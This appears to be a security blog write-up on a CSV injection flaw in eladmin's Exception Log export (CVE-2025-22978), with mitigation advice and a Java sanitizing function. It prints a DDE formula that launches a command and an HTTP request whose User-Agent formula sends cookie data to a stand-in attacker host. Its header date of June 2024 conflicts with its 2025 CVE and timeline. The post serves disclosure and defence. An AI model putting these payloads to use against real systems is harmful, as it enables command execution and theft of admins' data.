Date: June 2024
Author: SecureTech Writeups
Are you running eladmin, the popular open-source admin system? If so, you should know about a dangerous vulnerability tracked as CVE-2025-22978. This security issue allows attackers to inject malicious formulas into downloadables from the Exception Log module, leading to something called "CSV Injection." In this detailed post, we’ll break it down for you — simple, clear, with real-world code snippets, how the exploit works, and tips to keep your system safe.
🚨 What is CSV Injection?
CSV Injection (or Formula Injection) happens when user-controlled input is included in a CSV file without checks. If this data starts with a formula character like =, +, @, or - and someone opens the CSV in a spreadsheet like Microsoft Excel or LibreOffice, the formula can run automatically. This can leak data, steal credentials, or even run remote commands, depending on the formula.
📝 Where’s the Vulnerability in eladmin?
eladmin (<=2.7) has a management feature where you can download the Exception Log as a CSV file. The log entries can sometimes include user or attacker-supplied fields — like requestIp or description. These logs do not sanitize input for dangerous formula characters.
That means, if an attacker crafts a malicious exception (for example, by triggering an error using a crafted User-Agent header), the log could look like this:
| createTime | requestIp | description |
|---------------------|-------------|---------------------------|
| 2024-06-20 10:14:37 | =cmd|' /C calc'!A | NullPointerException ... |
And when you, the admin, download the log and open it in Excel... BAM! The payload runs.
1. Attacker crafts input
Suppose a bad user sends a request to your system, setting User-Agent (or another loggable field) as:
=cmd|'/C calc'!A
2. The log is generated
eladmin logs the exception, with requestIp or description field containing the attack string.
3. Admin downloads exception logs as CSV
The download feature does not sanitize or encode fields.
4. Opening CSV launches payload
When the file is opened in Excel, Excel will run the formula, potentially executing commands or making HTTP requests.
Example Entry in Exception Log
createTime,requestIp,description
2024-06-20 10:14:37,=cmd|' /C calc'!A,Exception stacktrace...
Minimal Exploit HTTP Example
GET /some/url HTTP/1.1
Host: eladmin.example.com
User-Agent: =HYPERLINK("http://evil.example.com/?cookie="&B2)
🛡️ How to Fix (Mitigation)
The main fix is to sanitize all user-controlled fields before writing them to CSV.
Preferably, prefix dangerous values with a single quote ', which turns them into plain text in Excel.
Secure Output Function Example (Java)
public static String sanitizeForCSV(String value) {
if (value != null && (
value.startsWith("=") ||
value.startsWith("+") ||
value.startsWith("-") ||
value.startsWith("@"))) {
return "'" + value;
}
return value;
}
Apply this to every field originating from user input or logs before writing to CSVs.
🕵️ Exploit Details
- Affected Software: eladmin <= v2.7 (GitHub Repository)
- Vulnerability: CSV Injection/Formula Injection in Exception Log Download
Attack Vector: Remote attacker injects malicious formulas via exception loggable input
- Impact: Remote code execution on admin's workstation (via Excel), data exfiltration, credential leaks
🧐 References & Links
- CVE-2025-22978 (Official MITRE Entry) *(Pending update)*
- eladmin GitHub Issue / Patch PR *(If/when available)*
- OWASP: CSV Injection
- Cheat Sheet: CSV Injection Prevention
🏁 Conclusion
If your organization uses eladmin, patch this now or implement the sanitization fix ASAP. Encourage your team never to open downloaded logs directly in Excel unless you're sure they’re clean. These formula-based attacks are sneaky and can lead to a much bigger breach than you imagine.
Stay safe, inspect your logs, secure your downloads!
*Like this post? Share with your IT colleagues. Got questions or want to report another vulnerability? Comment below or [reach out to us](mailto:security@securetech.example.com).*
Timeline
Published on: 02/03/2025 20:15:36 UTC
Last modified on: 03/13/2025 15:15:52 UTC